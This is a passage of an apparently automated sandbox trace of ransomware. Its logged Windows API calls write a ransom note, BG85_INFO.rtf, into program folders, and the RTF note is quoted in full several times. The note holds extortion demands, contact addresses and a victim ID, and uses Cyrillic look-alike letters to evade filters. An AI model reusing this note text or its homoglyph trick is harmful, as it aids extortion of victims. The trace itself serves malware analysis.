st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n;Ò\x9d¹t\x1fÎ[.ÈæÖ\x09\x8cUYѸ0Þ¿\x9e£\x8d¥R\x17ö×", lpUsedDefaultChar=0x0) returned 7247 [0135.956] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0135.957] CloseHandle (hObject=0x1d4) returned 1 [0135.958] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\bg85_info.rtf")) returned 0xffffffff [0135.958] GetLastError () returned 0x2 [0135.958] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0135.959] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0135.959] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 